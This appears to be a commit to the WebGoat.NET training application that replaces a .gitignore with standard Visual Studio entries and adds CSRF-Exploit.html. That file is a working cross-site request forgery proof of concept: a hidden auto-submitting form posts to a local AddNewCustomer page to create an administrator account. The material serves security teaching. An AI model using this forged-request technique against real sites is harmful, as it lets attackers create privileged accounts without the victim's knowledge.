Add new weaknesses

.gitignore

@@ -1,14 +1,199 @@
-# Project Files #
-#################
-*.userprefs
-*.pidb
-*swp
-bin
-obj
-WebGoat/App_Data/*.txt
-*.sqlite*
-WebGoat/Configuration/*.config
-
-# Trash Files #
-###############
-.DS_Store
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+
+# User-specific files
+*.suo
+*.user
+*.sln.docstates
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+x64/
+#build/
+bld/
+[Bb]in/
+[Oo]bj/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+#NUNIT
+*.VisualState.xml
+TestResult.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+*_i.c
+*_p.c
+*_i.h
+*.ilk
+*.meta
+*.obj
+*.pch
+*.pdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opensdf
+*.sdf
+*.cachefile
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+**/*.[Rr]e[Ss]harper
+**/*.DotSettings.user
+**/*.DotSettings
+
+# JustCode is a .NET coding addin-in
+.JustCode
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# NCrunch
+*.ncrunch*
+_NCrunch_*
+.*crunch*.local.xml
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+
+# NuGet Packages Directory
+packages/
+## TODO: If the tool you use requires repositories.config uncomment the next line
+#!packages/repositories.config
+
+# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
+# This line needs to be after the ignore of the build folder (and the packages folder if the line above has been uncommented)
+!packages/build/
+
+# Windows Azure Build Output
+csx/
+*.build.csdef
+
+# Windows Store app package directory
+AppPackages/
+
+# Others
+sql/
+*.Cache
+ClientBin/
+[Ss]tyle[Cc]op.*
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.pfx
+*.publishsettings
+node_modules/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file to a newer
+# Visual Studio version. Backup files are not needed, because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+
+# SQL Server files
+*.mdf
+*.ldf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# =========================
+# Windows detritus
+# =========================
+
+# Windows image file caches
+Thumbs.db
+ehthumbs.db
+
+# Folder config file
+Desktop.ini
+
+# Recycle Bin used on file shares
+$RECYCLE.BIN/
+
+# Project Files #
+#################
+WebGoat/App_Data/*.txt
+*.sqlite*
+WebGoat/Configuration/*.config
+
+# Trash Files #
+###############
+.DS_Store

CSRF-Exploit.html

@@ -0,0 +1,41 @@
+<head>
+</head>
+<body>
+    <script type="text/javascript">
+        function sendRequest(method, path, params) {
+            var form = document.createElement("form");
+            form.setAttribute("method", method);
+            form.setAttribute("action", path);
+            form.setAttribute("target", "hidden-form");
+            form.__submit = form.submit;
+
+            for (var key in params)
+            {
+                var field = document.createElement("input");
+                field.setAttribute("type", "hidden");
+                field.setAttribute("name", key);
+                field.setAttribute("value", params[key]);
+
+                form.appendChild(field);
+            }
+
+            document.body.appendChild(form);
+
+            var frame = document.createElement("iframe");
+            frame.setAttribute("style", "display:none");
+            frame.setAttribute("name", "hidden-form");
+            document.body.appendChild(frame);
+
+            form.__submit();
+        }
+
+        sendRequest('POST', 'http://localhost:3282/WebGoatCoins/AddNewCustomer.aspx',
+            {'__VIEWSTATE':'',
+             '__EVENTVALIDATION':'',
+             'ctl00$BodyContentPlaceholder$Username':'test',
+             'ctl00$BodyContentPlaceholder$Email':'[email protected]',
+             'ctl00$BodyContentPlaceholder$Password':'test',
+             'ctl00$BodyContentPlaceholder$IsAdmin':'on',
+             'ctl00$BodyContentPlaceholder$CreateCustomerButton':''});
+    </script>
+</body>